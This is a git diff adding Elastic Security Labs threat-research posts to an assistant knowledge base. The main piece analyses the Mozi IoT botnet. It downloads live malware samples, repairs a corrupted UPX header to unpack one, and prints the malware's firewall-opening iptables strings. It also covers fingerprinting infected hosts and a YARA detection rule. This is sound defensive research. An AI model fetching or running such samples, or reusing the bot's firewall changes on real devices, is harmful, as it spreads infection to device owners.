+[2022-01-10T21:33:33.097][WARNING] Could not parse source as PE file (DOS Header magic not found.)
+[2022-01-10T21:33:33.098][WARNING] CobaltStrike Beacon config not found:
+[2022-01-10T21:33:33.186][WARNING] Could not parse source as PE file (DOS Header magic not found.)
+[2022-01-10T21:33:33.191][WARNING] CobaltStrike Beacon config not found:
+[2022-01-10T21:33:33.461][WARNING] Could not parse source as PE file (DOS Header magic not found.)
+[2022-01-10T21:33:33.516][WARNING] CobaltStrike Beacon config not found:
+[2022-01-10T21:33:33.927][INFO] Wrote 2 docs to Elasticsearch
+
+```
+
+The [WARNING] messages here are to be expected. These are simply source documents that didn’t contain the configuration information.
+
+#### Filter by time
+
+To limit the search by time frame, you can add the --since argument, which takes either an ISO-formatted date time string or you can use [Elastic date math](https://www.elastic.co/guide/en/elasticsearch/reference/current/query-dsl-range-query.html#ranges-on-dates). For example, to limit search to the last 30 days, you can do the following.
+
+```
+docker run -ti --rm -v "$(pwd)/config.local.yml:/config.yml" \
+    cobalt-strike-extractor:latest --since "now-30d/d" -c config.local.yml
+
+```
+
+#### Pipe output to other tools
+
+Lastly, you can pipe the output to other commands, such as jq to do local analysis. You can also override the configuration file values using environment variables.
+
+```
+docker run -i --rm -a stdin -a stdout -a stderr \
+    -v "$(pwd)/config.local.yml:/config.yml" \
+    -e "OUTPUT_ELASTICSEARCH_ENABLED=False" \
+    -e "OUTPUT_CONSOLE_ENABLED=True" cobalt-strike-extractor:latest -c /config.yml -q | jq  '.cobaltstrike.server.hostname'
+
+```
+
+In the example above, we disabled the Elasticsearch output and enabled the Console output using environment variables. We made the output more quiet using the -q flag (hiding the warnings). Then, we used jq to just pull out the “hostname” value of the configuration.
+
+### Running it Locally
+
+As mentioned above, Docker is the recommended approach to running this project, however you can also run this locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. This will setup a virtual environment, install the dependencies, activate the virtual environment, and run the console script.
+
+```
+poetry lock
+poetry install
+poetry shell
+cobalt-strike-extractor --help
+
+```
+
+Once that works, you can do the same sort of things as mentioned in the Docker instructions above.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/collecting_and_operationalizing_threat_data_from_the_mozi_botnet.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/collecting_and_operationalizing_threat_data_from_the_mozi_botnet.md
new file mode 100644
index 0000000000000..ed450681a168b
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/collecting_and_operationalizing_threat_data_from_the_mozi_botnet.md
@@ -0,0 +1,450 @@
+---
+title: "Collecting and operationalizing threat data from the Mozi botnet"
+slug: "collecting-and-operationalizing-threat-data-from-the-mozi-botnet"
+date: "2022-06-02"
+description: "The Mozi botnet is an ongoing malware campaign targeting unsecured and vulnerable networking devices. This post will showcase the analyst journey of collecting, analyzing, and operationalizing threat data from the Mozi botnet."
+author:
+  - slug: andrew-pease
+  - slug: seth-goodwin
+  - slug: derek-ditch
+  - slug: daniel-stepanic
+image: "blog-thumb-mozi-botnet.jpg"
+category:
+  - slug: security-research
+---
+
+Detecting and preventing malicious activity such as botnet attacks is a critical area of focus for threat intel analysts, security operators, and threat hunters. Taking up the Mozi botnet as a case study, this blog post demonstrates how to use open source tools, analytical processes, and the Elastic Stack to perform analysis and enrichment of collected data irrespective of the campaign. This will allow you to take the lessons and processes outlined below to your organization and apply them to your specific use cases.
+
+The Mozi botnet has been leveraging vulnerable Internet of Things (IoT) devices to launch campaigns that can take advantage of the force multiplication provided by a botnet (Distributed Denial of Service (DDoS), email spam, brute-force, password spraying, etc.). Mozi was [first reported](https://blog.netlab.360.com/mozi-another-botnet-using-dht/) by the research team at 360Netlab in December 2019 and has continued to make up a large portion of IoT network activity across the Internet-at-large.
+
+As reported by 360Netlab, the botnet spreads via the use of weak and default remote access passwords for targeted devices as well as through multiple public exploits. The Mozi botnet communicates using a Distributed Hash Table (DHT) which records the contact information for other nodes in the botnet. This is the same serverless mechanism used by file sharing peer-to-peer (P2P) clients. Once the malware has accessed a vulnerable device, it executes the payload and subsequently joins the Mozi P2P network. The newly infected device listens for commands from controller nodes and also attempts to infect other vulnerable devices.
+
+Mozi targets multiple IoT devices and systems, mainly focused on Small Office Home Office (SOHO) networking devices, Internet-connected audio visual systems, and theoretically any 32-bit ARM device.
+
+## Collection
+
+When performing data analysis, the more data that you have, the better. Analysis of malware campaigns are no different. With a paid subscription to VirusTotal, you can collect huge amounts of data for analysis, but we wanted an approach for independent researchers or smaller organizations that may not have this premium service. To do that, we decided to keep to our roots at Elastic and leverage open source datasets to avoid a paywall that could prevent others from using our processes.
+
+To begin, we started with a handful of [Mozi samples](https://threatfox.abuse.ch/browse.php?search=tag%3Amozi) collected from [ThreatFox](https://threatfox.abuse.ch/). ThreatFox is an open source platform from [Abuse.ch](https://abuse.ch) with the goal of sharing malware indicators with the security research community.
+
+Using cURL, we queried the ThreatFox API for the Mozi tag. This returned back JSON documents with information about the malware sample, based on the tagged information.
+
+```
+curl -X POST https://threatfox-api.abuse.ch/api/v1/ -d '{ "query": "taginfo", "tag": "Mozi", "limit": 1 }'
+```
+
+_Code block 1 - cURL request to ThreatFox API_
+
+- -X POST - change the cURL HTTP method from GET (default) to POST as we’re going to be sending data to the ThreatFox API
+- `https://threatfox-api.abuse.ch/api/v1/` - this is the ThreatFox API endpoint
+- -d - this is denoting that we’re going to be sending data
+- query: taginfo - the type of query that we’re making, taginfo in our example
+- tag: Mozi - the tag that we’ll be searching for, “Mozi” in our example
+- limit: 1 - the number of results to return, 1 result in our example, but you can return up to 1000 results
+
+This returned the following information:
+
+```
+{
+    "query_status": "ok",
+    "data": [
+        {
+            "id": "115772",
+            "ioc": "nnn.nnn.nnn.nnn:53822",
+            "threat_type": "botnet_cc",
+            "threat_type_desc": "Indicator that identifies a botnet command&control server (C&C)",
+            "ioc_type": "ip:port",
+            "ioc_type_desc": "ip:port combination that is used for botnet Command&control (C&C)",
+            "malware": "elf.mozi",
+            "malware_printable": "Mozi",
+            "malware_alias": null,
+            "malware_malpedia": "https:\/\/malpedia.caad.fkie.fraunhofer.de\/details\/elf.mozi",
+            "confidence_level": 75,
+            "first_seen": "2021-06-15 08:22:52 UTC",
+            "last_seen": null,
+            "reference": "https:\/\/bazaar.abuse.ch\/sample\/832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b\/",
+            "reporter": "abuse_ch",
+            "tags": [
+                "Mozi"
+            ]
+        }
+    ]
+```
+
+_Code block 2 - Response from ThreatFox API_
+
+Now that we have the file hashes of several samples, we can download the samples using the Malware Bazaar API. Malware Bazaar is another open source platform provided by Abuse.ch. While ThreatFox is used to share contextual information about indicators, Malware Bazaar allows for the actual collection of malware samples (among other capabilities).
+
+Just like with ThreatFox, we’ll use cURL to interact with the Malware Bazaar API, but this time to download the actual malware samples. Of note, the Malware Bazaar API can be used to search for samples using a tag (“Mozi”, in our example), similar to how we used the ThreatFox API. The difference is that the ThreatFox API returns network indicators that we’ll use later on for data enrichment.
+
+```
+curl -X POST https://mb-api.abuse.ch/api/v1 -d 'query=get_file&sha256_hash=832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b' -o 832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b.raw
+```
+
+_Code block 3 - cURL request to Malware Bazaar API_
+
+- -X POST - change the cURL HTTP method from GET (default) to POST as we’re going to be sending data to the Malware Bazaar API
+- `https://mb-api.abuse.ch/api/v1` - this is the Malware Bazaar API endpoint
+- -d - this is denoting that we’re going to be sending data
+- query: get_file - the type of query that we’re making, get_file in our example
+- sha256_hash - the SHA256 hash we’re going to be collecting, “832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b” in our example
+- -o - the file name we’re going to save the binary as
+
+This will save a file locally named 832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b.raw. We want to make a raw file that we’ll not modify so that we always have an original sample for archival purposes. This downloads the file as a Zip archive. The passphrase to extract the archive is infected. This will create a local file named 832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b.elf. Going forward, we’ll use a shorter name for this file, truncated-87d3b.elf, for readability.
+
+### Unpacking
+
+Now that we have a few samples to work with we can look at ripping out strings for further analysis. Once in our analysis VM we took a stab at running [Sysinternals Strings](https://docs.microsoft.com/en-us/sysinternals/downloads/strings) over our sample:
+
+```
+$ strings truncated-87d3b.elf
+ELF
+*UPX!
+ELF
+$Bw
+(GT
+...
+```
+
+_Code block 3 - Strings output from the packed Mozi sample_
+
+Right away we see that we have a [UPX](https://upx.github.io/) packed ELF binary from the “ELF” and “UPX!” text. UPX is a compression tool for executable files, commonly known as “packing”. So the next logical step is to decompress the ELF file with the UPX program. To do that, we’ll run upx with the -d switch.
+
+```
+$ upx -d truncated-87d3b.elf
+                       Ultimate Packer for eXecutables
+                          Copyright (C) 1996 - 2020
+UPX 3.96w Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020
+        File size         Ratio      Format      Name
+   --------------------   ------   -----------   -----------
+upx.exe : upx: truncated-87d3b.elf : CantUnpackException: p_info corrupted
+```
+
+_Code block 4 - UPX output from corrupted Mozi sample_
+
+Another road-block: the p_info section of the file appears to be corrupted. p_info is the sum of two sections from a file, p_blocksize and p_filesize . After a quick search for the error message, we landed on a [CUJOAI Anti-Unpacking blog](https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/) explaining the header corruptions commonly used in IoT malware to disrupt automated analysis tools.
+
+Using this information, we cracked open our binary in [xxd](https://linux.die.net/man/1/xxd), a HEX dumper, to see which corruption we were dealing with. As described in the CUJOAI blog, the p_info blocks represent the sum of the p_filesize blocks and the p_blocksize blocks. This section begins with the 8 bytes after the UPX! text, and has been overwritten with zeros (the 8 bytes starting at 0x84 ).
+
+```
+$ xxd truncated-87d3b.elf
+00000000: 7f45 4c46 0101 0161 0000 0000 0000 0000  .ELF...a........
+00000010: 0200 2800 0100 0000 1057 0200 3400 0000  ..(......W..4...
+00000020: 0000 0000 0202 0000 3400 2000 0200 2800  ........4. ...(.
+00000030: 0000 0000 0100 0000 0000 0000 0080 0000  ................
+00000040: 0080 0000 0de0 0100 0de0 0100 0500 0000  ................
+00000050: 0080 0000 0100 0000 b07a 0000 b0fa 0600  .........z......
+00000060: b0fa 0600 0000 0000 0000 0000 0600 0000  ................
+00000070: 0080 0000 10f1 8f52 5550 5821 1c09 0d17  .......RUPX!....
+00000080: 0000 0000 0000 0000 0000 0000 9400 0000  ................
+00000090: 5e00 0000 0300 0000 f97f 454c 4601 7261  ^.........ELF.ra
+000000a0: 000f 0200 28dd 0001 0790 b681 0334 ee07  ....(........4..
+000000b0: ec28 04db 1302 0bfb 2000 031b be0a 0009  .(...... .......
+...
+```
+
+_Code block 5 - HEX view of the corrupted Mozi sample_
+
+The CUJOAI blog states that if you manually update the values of the p_filesize blocks and the p_blocksize blocks with the value of the p_info, this will fix the corruption issue. Below we can see the p_info section in HEX, and we can use that to manually update the p_filesize and p_blocksize sections, which will allow us to unpack the binary (the 4 bytes starting at 0x1e110).
+
+```
+$ xxd truncated-87d3b.elf
+...
+0001e0c0: 1914 a614 c998 885d 39ec 4727 1eac 2805  .......]9.G'..(.
+0001e0d0: e603 19f6 04d2 0127 52c9 9b60 00be 273e  .......'R..`..'>
+0001e0e0: c00f 5831 6000 0000 0000 90ff 0000 0000  ..X1`...........
+0001e0f0: 5550 5821 0000 0000 5550 5821 0d17 0308  UPX!....UPX!....
+0001e100: 5199 6237 591c 321c d001 0000 b800 0000  Q.b7Y.2.........
+0001e110: 7c2a 0400 5000 0011 8000 0000            |*..P.......
+```
+
+_Code block 6 - p_info HEX data from the corrupted Mozi sample_
+
+First, let’s open the file with Vim. As we can see, it is just a UPX file as denoted by the UPX!.
+
+```
+$ vim truncated-87d3b.elf
+^?ELF^A^A^Aa^@^@^@^@^@^@^@^@^B^@(^@^A^@^@^@^PW^B^@4^@^@^@^@^@^@^@^B^B^@^@4^@ ^@^B^@(^@^@^@^@^@^A^@^@^@^@^@^@^@^@<80>^@^@^@<80>^@^@^Mà^A^@^Mà^A^@^E^@^@^@^@<80>^@^@^A^@^@^@°z^@^@°ú^F^@°ú^F^@^@^@^@^@^@^@^@^@^F^@^@^@^@<80>^@^@^Pñ<8f>RUPX!^\
+```
+
+_Code block 7 - Corrupted Mozi sample in Vim_
+
+Using the xxd plugin for Vim, we can convert this to HEX so that we can make our modifications. This is achieved by typing :%!xxd, which will show us the HEX output for the file.
+
+```
+00000000: 7f45 4c46 0101 0161 0000 0000 0000 0000  .ELF...a........
+00000010: 0200 2800 0100 0000 1057 0200 3400 0000  ..(......W..4...
+00000020: 0000 0000 0202 0000 3400 2000 0200 2800  ........4. ...(.
+00000030: 0000 0000 0100 0000 0000 0000 0080 0000  ................
+00000040: 0080 0000 0de0 0100 0de0 0100 0500 0000  ................
+00000050: 0080 0000 0100 0000 b07a 0000 b0fa 0600  .........z......
+00000060: b0fa 0600 0000 0000 0000 0000 0600 0000  ................
+00000070: 0080 0000 10f1 8f52 5550 5821 1c09 0d17  .......RUPX!....
+00000080: 0000 0000 0000 0000 0000 0000 9400 0000  ................
+00000090: 5e00 0000 0300 0000 f97f 454c 4601 7261  ^.........ELF.ra
+000000a0: 000f 0200 28dd 0001 0790 b681 0334 ee07  ....(........4..
+000000b0: ec28 04db 1302 0bfb 2000 031b be0a 0009  .(...... .......
+```
+
+_Code block 8 - Corrupted Mozi sample in Vim with XXD plugin_
+
+Next, we can just update bytes 0x84 - 0x8b(that we identified as having the zero’d out p_filesize and p_blocksize) with the HEX value for p_info (7c2a 0400).
+
+```
+00000080: 0000 0000 7c2a 0400 7c2a 0400 9400 0000  ....|*..|*......
+```
+
+_Code block 9 - Updated p_filesize and p_blocksize HEX values_
+
+Let’s reset the file back using :%!xxd -r, save the file and exit Vim (:wq).
+
+Finally, let’s try to unpack the file now that we’ve manually adjusted the HEX values.
+
+```
+$ upx -d truncated-87d3b.elf
+                       Ultimate Packer for eXecutables
+                          Copyright (C) 1996 - 2020
+UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020
+        File size         Ratio      Format      Name
+   --------------------   ------   -----------   -----------
+    273020 <-    123165   45.11%    linux/arm    truncated-87d3b.elf
+Unpacked 1 file.
+```
+
+_Code block 10 - Successfully unpacked Mozi sample_
+
+We now have successfully unpacked the file. Let’s check to see what kind of file this is now by using the file command.
+
+```
+$ file truncated-87d3b.elf
+truncated-87d3b.elf: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
+```
+
+_Code block 11 - File type identification of the Mozi sample_
+
+Now, we can again use the strings command to see if there is any useful information that we can use (truncated for readability).
+
+```
+$ strings truncated-87d3b.elf
+...
+iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
+iptables -I PREROUTING  -t nat -p udp --destination-port %d -j ACCEPT
+iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
+iptables -I INPUT  -p udp --dport %d -j ACCEPT
+iptables -I OUTPUT -p udp --sport %d -j ACCEPT
+iptables -I PREROUTING  -t nat -p udp --dport %d -j ACCEPT
+iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
+0.0.0.0
+[idp]
+This node doesn't accept announces
+v2s
+dht.transmissionbt.com:6881
+router.bittorrent.com:6881
+router.utorrent.com:6881
+bttracker.debian.org:6881
+nnn.nnn.nnn.nnn:6881
+abc.abc.abc.abc:6881
+xxx.xxx.xxx.xxx:6881
+yyy.yyy.yyy.yyy:6881
+NfZ
+Oo~Mn
+g5=
+N]%
+Range: bytes=
+User-Agent:
+...
+```
+
+_Code block 12 - Strings output from the unpacked Mozi sample_
+
+Running Strings, we can see, among other things, network indicators and changes to the local firewall, iptables. There is a lot of great information in this file that we can now review which can be used to search for infected devices.
+
+Next, let’s enrich the ThreatFox data, store it in Elasticsearch, and visualize it with Kibana.
+
+## Storing threat data in the Elastic Stack
+
+Looking at what we’ve collected so far, we have rich threat data provided by ThreatFox that includes both network and file information. Additionally, we have actual malware samples collected from Malware Bazaar. Finally, we have performed static file analysis on the malware to identify additional indicators that could be of use.
+
+For the next steps, we’re going to parse the data from ThreatFox and store that in the Elastic Stack so that we can leverage Kibana to visualize data to identify clusters of activity.
+
+## Create the Ingest Node Pipeline
+
+We're going to create an Ingest Node Pipeline to transform the data from ThreatFox into enriched Elasticsearch data. When making a pipeline, it's useful to make a table to lay out what we're going to do.
+
+|                              |                                                                 |
+| ---------------------------- | --------------------------------------------------------------- |
+| ThreatFox field              | ECS-style field                                                 |
+| id                           | event.id                                                        |
+| ioc                          | threat.indicator.ip and threat.indicator.port                   |
+| threat_type                  | threat.software.type                                            |
+| threat_type_desc             | threat.indicator.description                                    |
+| ioc_type                     | threat.indicator.type. Set threat.indicator.type to "ipv4-addr" |
+| malware                      | threat.software.name                                            |
+| malware_printable            | threat.threatfox.malware_printable                              |
+| malware_alias                | threat.software.alias (if non-null)                             |
+| malware_malpedia             | threat.software.reference                                       |
+| confidence_level             | threat.indicator.confidence                                     |
+| first_seen                   | threat.indicator.first_seen                                     |
+| last_seen                    | threat.indicator.last_seen                                      |
+| reference                    | event.reference                                                 |
+| reporter                     | event.provider                                                  |
+| tags                         | tags                                                            |
+| `<enrichment>`               | threat.indicator.geo. Enriched by our geoip processor.          |
+| `<parsed-sha256>`            | file.hash.sha256 and related.hash                               |
+| `<copy threat.indicator.ip>` | related.ip                                                      |
+
+_Table 1 - Elasticsearch Ingest Node Pipeline for ThreatFox data_
+
+To create the pipeline, go to **Kibana Stack Management** -> **Ingest Node Pipelines** , then click **Create pipeline**.
+
+![Figure 1 - Creating Ingest Node Pipeline for ThreatFox data](/assets/images/collecting-and-operationalizing-threat-data-from-the-mozi-botnet/blog-mozi-botnet-1.jpg)
+
+Next, we’ll give our pipeline a name, optionally a version, and a description.
+
+From this view you can manually add processors and configure them to your liking. To give you a head start, we've provided the [ThreatFox pipeline definition here](https://github.com/elastic/examples/blob/master/blog/mozin-about/ingest-node-pipeline.json) you can paste in.
+
+Click **Import processors** and paste the contents of this pipeline definition: [pipeline.json](https://github.com/elastic/examples/blob/master/blog/mozin-about/ingest-node-pipeline.json).
+
+When you click **Load and overwrite** , you'll have each processor listed there as we've configured it. From here you can tweak it to your needs, or just scroll down and click **Create pipeline**.
+
+![Figure 2 - Ingest Node Processors for ThreatFox data](/assets/images/collecting-and-operationalizing-threat-data-from-the-mozi-botnet/blog-mozi-botnet-2.jpg)
+
+Alternatively, if you’d like to use a turnkey approach, the [collection.sh](https://github.com/elastic/examples/blob/master/blog/mozin-about/collection.sh) script will allow you to collect the ThreatFox Mozi data, create the Elasticsearch ingest pipeline, the indicators Index, the Index Pattern, and send the data from ThreatFox directly into Elasticsearch.
+
+```
+$ git clone https://github.com/elastic/examples
+$ cd examples/blog/mozin-about
+$ sh collection.sh
+```
+
+_Code block 13 - Using the Mozi sample collection script_
+
+Using the provided collection script, we can see the Threat Fox data is converted into the Elastic Common Schema (ECS) and sent to Elasticsearch for analysis.
+
+<Video vidyard_uuid="hUokXLAUFJ7Tvp6mDQR6qH" />
+
+_Figure 3 - ThreatFox data in Kibana_
+
+## Analysis
+
+Now that we’ve collected our samples, enriched them, and stored them in Elasticsearch, we can use Kibana to visualize this data to identify clusters of activity, make different observations, and set up different pivots for new research.
+
+As a few quick examples, we can identify some ports that are used and countries that are included in the dataset.
+
+Let’s start with identifying high-density network ports. Make a Lens visualization in Kibana by clicking on **Visualization Library** → **Create visualization** → **Lens**. We can make a simple donut chart to highlight that the threat.indicator.port of 6000 makes up over 10% of the network ports observed. This could lead us to explore other network traffic that is using port 6000 to identify other potentially malicious activity.
+
+![Figure 4 - Port layout for Mozi network traffic](/assets/images/collecting-and-operationalizing-threat-data-from-the-mozi-botnet/blog-mozi-botnet-4.png)
+
+Of note, port 0 and 4000 are also observed and are interesting. Ports 6000, 4000, nor 0 are overly common on the Internet-at-large and could be used to identify other compromised hosts. It should be noted that while transient network indicators like IP and port are useful, they should not be used as the sole source to identify malicious activity irrespective of the intrusion set being investigated.
+
+Next, we can use a Kibana Maps visualization to identify geographic clusters of activities, and include associated context such as indicator confidence, provider, and type.
+
+![Figure 5 - Geographic data from Mozi command & control infrastructure](/assets/images/collecting-and-operationalizing-threat-data-from-the-mozi-botnet/blog-mozi-botnet-5.jpg)
+
+Similar to the commentary above on IP and ports, geographic observations should not be the sole source used to take action. These are simply indicators for observed samples and require organizational-centric analysis to ascertain their meaning as it relates to the specific network.
+
+This is useful information we can make the following analytical assertions based on our sampling:
+
+- Mozi botnet is currently active and maintaining steady infection rates
+- Port 6000 is a dominant port used for command & control
+- At least 24 countries impacted suggests global threat with no specific targeting
+- Clusters of specific ASNs in Bulgaria and India stand out with highest volumes
+
+As the analysis process starts to flow, it ends up providing additional avenues for research. One example an analyst may pursue is a propagation mechanism through the use of HTTP fingerprinting.
+
+## Exploring the propagation mechanism
+
+In the same manner as criminal fingerprints are tracked and logged in a database, a similar technique can be applied to publicly facing network infrastructure. An HTTP request can be sent to a webserver and the HTTP response that is returned can be used to identify possible web applications hosted on the server; even the ordering of the fields in the HTTP response can be used as an identifier.
+
+One thing we learned about Mozi and how it contributes to its spreading power is that each compromised device contributes to the infection of future victims. The compromised device starts an HTTP server that hosts a Mozi payload on a random TCP port. Knowing this information, we can collect content from an infected system to generate a fingerprint using cURL.
+
+```
+curl -I nnn.nnn.nnn.nnn:53822
+HTTP/1.1 200 OK
+Server: nginx
+Content-Length: 132876
+Connection: close
+Content-Type: application/zip
+```
+
+_Code block 14 - HTTP response from a compromised device_
+
+Based on the observed response back, we can pull back some interesting information such as:
+
+- The use of an NGINX web server
+- No HTTP Date Header provided
+- The size of the file returned is close to 133 kilobytes
+
+With this small amount of data, we can pivot to different search engines that store response data from these kinds of devices all over the world. By leveraging tools like [Shodan](https://www.shodan.io/), we can perform a search using the information obtained in the HTTP response. We’ll wildcard the Content-Length but use the same order for all of the HTTP response elements:
+
+```
+HTTP/1.1 200 OK Server: nginx Content-Length: * Connection: close Content-Type: application/zip
+```
+
+_Code block 15 - HTTP header for Mozi propagation_
+
+We can see a number of hits where this same response was captured on other devices and start to pinpoint additional machines. Below are a few examples from a Shodan search:
+
+![Figure 6 - Additional impacted devices](/assets/images/collecting-and-operationalizing-threat-data-from-the-mozi-botnet/blog-mozi-botnet-6.jpg)
+
+Other search examples over response data could be used as well such as the actual bytes of the malicious Mozi file that was returned in the response.
+
+## Mitigation
+
+The Mozi botnet propagates through the abuse of default or weak remote access passwords, exploits and outdated software versions. To defend devices from exploitation, we recommend:
+
+- Changing the device default remote access passphrases
+- Updating devices to the latest firmware and software version supported by the vendor
+- Segmenting IoT devices from the rest of your internal network
+- Not making IoT devices accessible from the public Internet
+
+## Detection logic
+
+Using [YARA](https://virustotal.github.io/yara/), we can write a signature for the corrupted UPX header. Similar to rules that look for specific types of PowerShell obfuscation, the obfuscation mechanism itself can occasionally be a better indicator of maliciousness than attempting to signature the underlying activity. It is extremely important to note that zeroing out part of the header sections was the technique that we observed with our samples. There are a litany of other obfuscation and anti-analysis techniques that could be used with other samples. MITRE ATT&CK® describes additional subtechniques for the [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027/) technique from the [Defense Evasion](https://attack.mitre.org/tactics/TA0005) tactic.As noted above, the observed anti-analysis technique used by the analyzed Mozi samples consists solely of zeroing out the 8 bytes after the “UPX!” magic bytes, and the 4 bytes before that are always zero, so let's use a YARA signature derived from the work by [Lars Wallenborn](https://blag.nullteilerfrei.de/2019/12/26/upx-packed-elf-binaries-of-the-peer-to-peer-botnet-family-mozi/) (expanded for readability).
+
+```
+rule Mozi_Obfuscation_Technique
+{
+  meta:
+    author =  "Elastic Security, Lars Wallenborn (@larsborn)"
+    description = "Detects obfuscation technique used by Mozi botnet."
+  strings:
+    $a = { 55 50 58 21
+           [4]
+           00 00 00 00
+           00 00 00 00
+           00 00 00 00 }
+  condition:
+    all of them
+}
+```
+
+_Code block 16 - YARA signature detecting Mozi obfuscation_
+
+- 55 50 58 21 - identifies the UPX magic bytes
+- [4] - offset by 4 bytes, the l_lsize, l_version & l_format
+- 00 00 00 00 - identifies the program header ID
+- 00 00 00 00 - identifies the zero’d out p_filesize
+- 00 00 00 00 - identifies the zero’d out p_blocksize
+- condition - requires that all of the above strings exist for a positive YARA signature match
+
+The above YARA signature can be used to identify ELF files that are packed with UPX and have the header ID, p_filesize, and p_blocksize elements zero’d out. This can go a long way in identifying obfuscation techniques in addition to Mozi samples. In our testing, we used this YARA signature with a 94.6% efficiency for detecting Mozi samples.
+
+## Summary
+
+The Mozi botnet has been observed targeting vulnerable Internet of Things (IoT) devices to launch seemingly non-targeted campaigns that can take advantage of the force multiplication provided by a botnet. Mozi has been in operation since at least December 2019.
+
+We covered techniques to collect, ingest, and analyze samples from the Mozi botnet. These methodologies can also be leveraged to enhance and enable analytical processes for other data samples.
+
+## Additional resources
+
+- Blog artifacts and scripts, Elastic: [https://github.com/elastic/examples/tree/master/blog/mozin-about](https://github.com/elastic/examples/tree/master/blog/mozin-about)
+- ThreatFox Indicator of Compromise Database, Abuse.ch: [https://threatfox.abuse.ch/browse](https://threatfox.abuse.ch/browse)
+- UPX Anti-Unpacking Techniques in IoT Malware, CUJOAI: [https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware](https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware)
+- Corrupted UPX Packed ELF Repair, vcodispot.com: [https://vcodispot.com/corrupted-upx-packed-elf-repair](https://vcodispot.com/corrupted-upx-packed-elf-repair)
+- UPX PACKED ELF BINARIES OF THE PEER-TO-PEER BOTNET FAMILY MOZI, Lars Wallenborn: [https://blag.nullteilerfrei.de/2019/12/26/upx-packed-elf-binaries-of-the-peer-to-peer-botnet-family-mozi](https://blag.nullteilerfrei.de/2019/12/26/upx-packed-elf-binaries-of-the-peer-to-peer-botnet-family-mozi)
+- Mozi, Another Botnet Using DHT, 360 Netlab: [https://blog.netlab.360.com/mozi-another-botnet-using-dht](https://blog.netlab.360.com/mozi-another-botnet-using-dht)
+- Mozi Botnet Accounts for Majority of IoT Traffic, Tara Seals: [https://threatpost.com/mozi-botnet-majority-iot-traffic/159337](https://threatpost.com/mozi-botnet-majority-iot-traffic/159337)
+- New Mozi P2P Botnet Takes Over Netgear, D-Link, Huawei Routers, Sergiu Gatlan: [https://www.bleepingcomputer.com/news/security/new-mozi-p2p-botnet-takes-over-netgear-d-link-huawei-routers](https://www.bleepingcomputer.com/news/security/new-mozi-p2p-botnet-takes-over-netgear-d-link-huawei-routers)
+- Kibana Maps, Elastic: [https://www.elastic.co/guide/en/kibana/current/maps.html](https://www.elastic.co/guide/en/kibana/current/maps.html)
+- Kibana Lens, Elastic: [https://www.elastic.co/guide/en/kibana/current/lens.html](https://www.elastic.co/guide/en/kibana/current/lens.html)
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/collecting_cobalt_strike_beacons_with_the_elastic_stack.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/collecting_cobalt_strike_beacons_with_the_elastic_stack.md
new file mode 100644
index 0000000000000..54636b615de9d
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/collecting_cobalt_strike_beacons_with_the_elastic_stack.md
@@ -0,0 +1,113 @@
+---
+title: "Collecting Cobalt Strike Beacons with the Elastic Stack"
+slug: "collecting-cobalt-strike-beacons-with-the-elastic-stack"
+date: "2022-06-01"
+description: "Part 1 - Processes and technology needed to extract Cobalt Strike implant beacons"
+author:
+  - slug: derek-ditch
+  - slug: daniel-stepanic
+  - slug: seth-goodwin
+  - slug: andrew-pease
+image: "photo-edited-01@2x.jpg"
+category:
+  - slug: attack-pattern
+tags:
+  - tutorial
+  - cobalt strike
+  - fleet
+---
+
+## Overview
+
+[Cobalt Strike](https://attack.mitre.org/software/S0154/) is a premium offensive security tool leveraged by penetration testers and red team members as a way to emulate adversary behavior. The goal is to validate security detection capabilities and processes replicating a real-world intrusion. While Cobalt Strike is a legitimate tool, it is often [abused by actual threat actors](https://www.proofpoint.com/uk/blog/threat-insight/cobalt-strike-favorite-tool-apt-crimeware) as a way to gain and maintain persistence into targeted networks.
+
+To manage command and control, Cobalt Strike leverages an implant that uses beacon configuration known as a [Malleable Command and Control](https://www.cobaltstrike.com/help-malleable-c2) (Malleable C2) profile. A Malleable C2 profile contains a tremendous number of options to configure the beacon’s functionality, please see [Cobalt Strike’s official documentation](https://www.cobaltstrike.com/help-beacon) for specifics on configuring Malleable C2 beacons.
+
+This blog will focus on using the Elastic Stack to collect Cobalt Strike beacon payloads, extract and parse the beacon configurations, and an analysis of the metadata within the configurations. This will all be taken from the memory of targeted Windows endpoints that we’ve collected from our telemetry.
+
+## The Fleet Policy
+
+[Fleet](https://www.elastic.co/guide/en/kibana/current/fleet.html) is an app in Kibana that provides a central place to configure and monitor your Elastic Agents. Fleet uses [integrations](https://www.elastic.co/guide/en/fleet/current/integrations.html), which are unified plugins that allow data to be collected from apps and services, and then stored in Elasticsearch. Integrations are added to policies, and Elastic Agents are added to policies.
+
+First, we need to configure the collection of shellcode and malicious memory regions in a Fleet policy. This will collect 4MB of data from memory surrounding shellcode and malicious memory events. It should be noted that this collection may significantly increase the amount of data stored in Elasticsearch.
+
+You can add this to an existing policy or create a new policy. To create a new policy, in Kibana, navigate to Fleet → Agent Policies → Create agent policy. Give your policy a name and description. Optionally, you can disable “System monitoring” and “Agent monitoring” to reduce the amount of system and agent metadata collected from your endpoints. Click on “Create agent policy”.
+
